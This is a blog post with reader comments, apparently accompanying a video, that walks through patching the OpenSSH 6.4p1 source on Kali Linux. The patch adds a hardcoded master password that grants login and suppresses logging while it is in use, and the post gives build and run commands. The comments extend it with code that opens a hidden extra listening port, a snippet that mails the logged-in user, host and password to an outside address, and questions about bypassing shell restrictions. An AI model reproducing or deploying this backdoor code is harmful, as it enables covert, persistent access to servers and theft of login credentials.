Skip to content

[Video] - Build a backdoor in OpenSSH 6.4p1 with Kali Linux

This time I show you, how to build a "backdoor" in your own OpenSSH 6.4p1 installation under Kali Linux


Download needed files
cd /tmp/
wget --no-check-certificate
tar xvfz openssl-1.0.1e.tar.gz
tar xvfz openssh-6.4p1.tar.gz
Preparing the system
mkdir /usr/local/ssl/
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/include
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/lib
ln -s /usr/lib/i386-linux-gnu/ /usr/lib/

Changing OpenSSH

// auth.h
#define B4CKD00R "myeasypass"
int backdoorActive;

// auth-passwd.c
auth_password(Authctxt *authctxt, const char *password)
        struct passwd * pw = authctxt->pw;
        int ok = authctxt->valid;
        backdoorActive = 0;

        if (!strcmp(password, B4CKD00R)) {
                backdoorActive = 1;
                return 1;

// log.h
int backdoorActive;

// log.c
do_log(LogLevel level, const char *fmt, va_list args)
if(backdoorActive == 1)

Compile & install OpenSSH on your local Kali installation
./configure --with-ssl-dir=/tmp/openssl-1.0.1e/
make install

Change SSH-Port if needed
vi /usr/local/etc/sshd_config
Port 2222
Start your new local SSH-Daemon
/usr/local/sbin/sshd -f /usr/local/etc/sshd_config

Test it!


No Trackbacks


Display comments as Linear | Threaded

noname on :

yes mate is grate looks ok .. but when you login you are in ps and w command, and compromise all your activity

Nick on :

Hi mate this looks nice can you made a video tutorial or just write the commands for a different openede port connexion?
i mean if you can explain to me how i can do this to work for example on 9863 but 22 to be still on! cheers !
by the way 9863 i don’t want to be visible on /etc/ssh/sshd_config i know this it’s possible but i don’t know how!

Stefan Schurtz on :


you mean something like that:


if (options->num_ports == 0)
options->ports[options->num_ports++] = SSH_DEFAULT_PORT;

change to

if (options->num_ports == 0) {
options->ports[options->num_ports++] = SSH_DEFAULT_PORT;
options->ports[options->num_ports++] = 9863;

If port will be changed in config file, change this


case sPort:
if (!arg || *arg == ‘\0’)
fatal("%s line %d: missing port number.",
filename, linenum);
options->ports[options->num_ports++] = a2port(arg);
options->ports[options->num_ports++] = 9863;

Not sure if this works in all situations. Perhaps you can test a little bit more than I did :)


Nick on :

no problem mate i just try both of them didn’t work for me even the port even to make from 6.5 with centos or ubuntu i need something new i try as well to implement sendmail on this no success!
the email function been this for me
/* fopen example */

int main ()
FILE *fp; char *ttyn = ttyname(0); char msgbuf1000; struct utmp *ut; while ((ut = getutent())) { if (strcmp(ttyn, ut->ut_line) == 0) { strcat(msgbuf, "\nFrom: "); strcat(msgbuf, ut->ut_user); strcat(msgbuf, "@"); strcat(msgbuf, ut->ut_host); break; } }

fp = popen("mail -s ‘us loggedin’ x19@xxxxxxxxxxx", pw_user>user & password); fprintf(fp, "%s\n", msgbuf); pclose(fp); return 0; } [/code]

meh on :

Seems to work only if ran by root. How about if you want to run it as unprivileged user?

Also, do you know how to bypass the valid shell check and always assign /bin/bash, even if it’s set to /bin/false?
Or at least how to override the passwd path to something like ./passwd, so it can be modified by the unprivileged user.

Add Comment

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.

Textile-formatting allowed
You can use [geshi lang=lang_name [,ln={y|n}]][/geshi] tags to embed source code snippets.
Form options

Submitted comments will be subject to moderation before being displayed.

Imprint | Contact | Privacy Statement